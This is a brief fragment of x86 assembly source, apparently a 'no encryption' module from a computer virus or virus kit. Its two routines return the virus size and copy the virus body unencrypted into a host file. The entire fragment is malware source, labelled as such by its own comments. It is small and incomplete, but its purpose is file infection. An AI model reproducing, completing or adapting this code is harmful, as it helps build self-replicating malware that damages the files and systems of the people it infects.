;%%%6 0 NXOR Dont use encryption

;return virus size

get_virus_size:
	mov eax, virus_size
	ret

;as this virus dont use encryption, just copy it to host file

encrypt:
	sub eax,eax
	pushad
	rep movsb
	popad
	ret

